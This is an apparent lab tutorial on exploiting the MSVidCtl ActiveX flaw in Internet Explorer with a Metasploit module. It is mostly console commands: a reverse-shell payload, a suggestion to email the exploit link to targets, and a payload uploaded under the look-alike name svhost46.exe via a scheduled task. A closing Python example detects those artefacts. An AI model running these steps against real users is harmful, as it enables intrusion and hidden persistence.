Exploiting MSVidCtl ActiveX with Metasploit

Recently an exploit for the MSVidCtl component of Microsoft DirectShow was found that causes a memory corruption in Internet Explorer 6 and 7, giving a shell on the target box under the IE process. Trancer contributed an exploit module to Metasploit that triggers this vulnerability with a crafted GIF image. I would like to cover a simple example of using the exploit and then switching to another Meterpreter session, so that when the targeted Internet Explorer is killed by the user we do not lose shell access. Migrate sadly does not work here: the process is left in such an unstable state that trying to migrate the Meterpreter session tends to kill it.

We start by running msfconsole after updating Metasploit to the latest dev version:

carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole 
[sudo] password for carlos: 
                |                    |      _) |   
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __| 
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |   
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| 
                              _|                   
       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux
msf >

We load the exploit module, set a Meterpreter payload, and look at the options available to us:

msf > use exploit/windows/browser/msvidctl_mpeg2 
msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(msvidctl_mpeg2) > show options
Module options:
   Name     Current Setting  Required  Description                                          
   ----     ---------------  --------  -----------                                          
   SRVHOST  0.0.0.0          yes       The local host to listen on.                         
   SRVPORT  8080             yes       The local port to listen on.                         
   SSL      false            no        Use SSL                                              
   URIPATH                   no        The URI to use for this exploit (default is random)  
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description                           
   ----      ---------------  --------  -----------                           
   EXITFUNC  process          yes       Exit technique: seh, thread, process  
   LHOST                      yes       The local address                     
   LPORT     4444             yes       The local port                        
Exploit target:
   Id  Name                                        
   --  ----                                        
   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0  

We set the options for the payload and the exploit module, then launch it:

msf exploit(msvidctl_mpeg2) > set SRVPORT 80
SRVPORT => 80
msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(msvidctl_mpeg2) > set URIPATH secure.html
URIPATH => secure.html
msf exploit(msvidctl_mpeg2) > exploit
[*] Exploit running as background job.
msf exploit(msvidctl_mpeg2) > 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/secure.html
[*]  Local IP: http://192.168.1.158:80/secure.html
[*] Server started.

The module is now serving an HTML page that carries the crafted GIF. The link can be sent to the target user in an email or delivered by any other method; once the user opens it in Internet Explorer, the browser is exploited and we get a shell:

[*] Sending HTML to 192.168.1.139:1126...
[*] Sending exploit to 192.168.1.139:1126...
[*] Sending GIF to 192.168.1.139:1126...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (206848 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1127)
msf exploit(msvidctl_mpeg2) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > 

This leaves Internet Explorer hung on the target machine. We want to get out of that process as quickly as possible to preserve our access; in my tests running migrate killed the session, so I chose to use the scheduleme Meterpreter script to upload a Meterpreter payload and have the scheduler service run it immediately, giving us a secondary shell:

meterpreter > run scheduleme -i -e ./rmeter.exe 
[*] Uploadingd ./rmeter.exe....
[*] ./rmeter.exe uploaded!
[*] Scheduling command C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe to run now.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck36 /F
meterpreter > 
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (206848 bytes)
[*] Meterpreter session 2 opened (192.168.1.158:4444 -> 192.168.1.139:1128)
meterpreter > 
Background session 1? [y/N]  
msf exploit(msvidctl_mpeg2) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > 

We reached the secondary shell by pressing Ctrl-Z to background the initial session and then interacting with the second one. This can be automated by setting the AutoRunScript option on the exploit module.
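From the defender's side, the secondary session above leaves two artefacts a host log can catch: a scheduled task whose command points at an executable in the user's Temp directory, and a binary named to look like svchost.exe running from somewhere other than System32. The following Python is an added example, not code from the original post or from Metasploit; the log lines and their simplified key=value format are constructed for illustration, reusing the names seen in the scheduleme output.

```python
import re
from typing import NamedTuple

# Constructed sample host log in a simplified key=value form (not a real
# Windows event export). Paths and names mirror the scheduleme output above.
SAMPLE_LOG = r"""
Type=TaskCreated User=WINXPLAB01\labuser Task=syscheck36 Command=C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe
Type=TaskCreated User=WINXPLAB01\SYSTEM Task=UpdateCheck Command="C:\Program Files\Updater\update.exe"
Type=ProcessStart User=WINXPLAB01\labuser NewProcess=C:\WINDOWS\system32\svchost.exe Parent=C:\WINDOWS\system32\services.exe
Type=ProcessStart User=WINXPLAB01\labuser NewProcess=C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe Parent=C:\WINDOWS\system32\svchost.exe
""".strip()

# Executable located under a Temp/Tmp directory (8.3 short paths included).
TEMP_DIR = re.compile(r"\\te?mp\\", re.IGNORECASE)
# Names within a couple of characters of svchost.exe, optionally numbered.
HOST_LOOKALIKE = re.compile(r"^s[a-z]{0,2}host\d*\.exe$", re.IGNORECASE)
# The one location where a genuine svchost.exe is expected to live.
SYSTEM32_SVCHOST = re.compile(r"^c:\\windows\\system32\\svchost\.exe$", re.IGNORECASE)


class Finding(NamedTuple):
    line_no: int
    reason: str
    path: str


def parse_fields(line: str) -> dict:
    """Split one log line into a dict; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


def analyse(log: str) -> list:
    """Return a Finding for every suspicious task creation or process start."""
    findings = []
    for n, line in enumerate(log.splitlines(), 1):
        fields = parse_fields(line)
        path = fields.get("Command") or fields.get("NewProcess")
        if not path:
            continue
        name = path.rsplit("\\", 1)[-1]
        if fields.get("Type") == "TaskCreated" and TEMP_DIR.search(path):
            findings.append(Finding(n, "scheduled task runs an executable from Temp", path))
        if HOST_LOOKALIKE.match(name) and not SYSTEM32_SVCHOST.match(path):
            findings.append(Finding(n, "svchost look-alike outside System32", path))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason}: {f.path}")
```

The genuine svchost.exe on line 3 of the sample is left alone; the Temp-resident svhost46.exe is flagged both when the task is created and when it starts.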